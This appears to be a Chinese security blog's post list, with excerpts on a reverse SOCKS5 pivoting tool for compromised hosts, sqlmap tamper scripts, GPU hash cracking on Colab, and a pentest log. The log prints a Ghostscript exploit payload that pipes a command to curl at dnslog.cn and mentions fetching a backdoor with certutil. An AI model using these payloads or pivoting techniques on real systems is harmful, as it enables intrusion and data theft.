脚本小子
安全新手,工具党
于小葵
脚本小子 && 嘴炮
展开
-
反向socks5代理工具
github.com/yuxiaokui/gohtran 闲来无事,用golang写了个反向socks5代理工具. 方便搞渗透的同学们使用. 首先在公网VPS上执行listener 3389 33333 3389端口是用来监听肉鸡上线的,后面的33333端口是开放的socks5服务端口. 然后在内网的肉鸡中执行client vps_ip:3389 webshell也可以玩哦. OK,配上socks5代理,尽情内网漫游吧. 本工具完全开源,大家随意修改. ...原创 2020-09-08 15:07:43 · 764 阅读 · 0 评论 -
【转载】sqlmap-tamper使用介绍
SQLMAP当前为1.2.7.20,共有57个tamper脚本,与1.0版本相比新增了19个脚本。 序号 脚本名称 注释 1 0x2char 将每个编码后的字符转换为等价表达 2 apostrophemask 单引号替换为Utf8字符 3 apostrophenullencode 替换双引号为%00%27 4 appendnullbyte 有效代码后添加%00 5 base64encode 使用base64编码 6 between 比较符替换为between 7 bl转载 2020-06-11 10:35:02 · 363 阅读 · 0 评论 -
白嫖Google Colab进行GPU解密
一.Colab简介 https://colab.research.google.com/notebooks/welcome.ipynb 偶然间接触到Colab,发现它居然支持GPU,而且是免费使用。 官方介绍: Colaboratory 是一个免费的 Jupyter 笔记本环境,不需要进行任何设置就可以使用,并且完全在云端运行。 借助 Colaboratory,可以编写和执行代码、保存和共享分析结果,以及利用强大的计算资源,所有这些都可通过浏览器免费使用。 二.破解密码 首先需要安装HASHCAT pri原创 2020-06-11 10:32:44 · 3057 阅读 · 1 评论 -
记录一次常规的渗透测试
首先是魔图漏洞 %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%curl http://dnslog.cn/`whomai`) currentdevice putdeviceprops 然后windows下载后门。 方法1:certutil.exe -urlca原创 2020-06-01 10:32:08 · 414 阅读 · 0 评论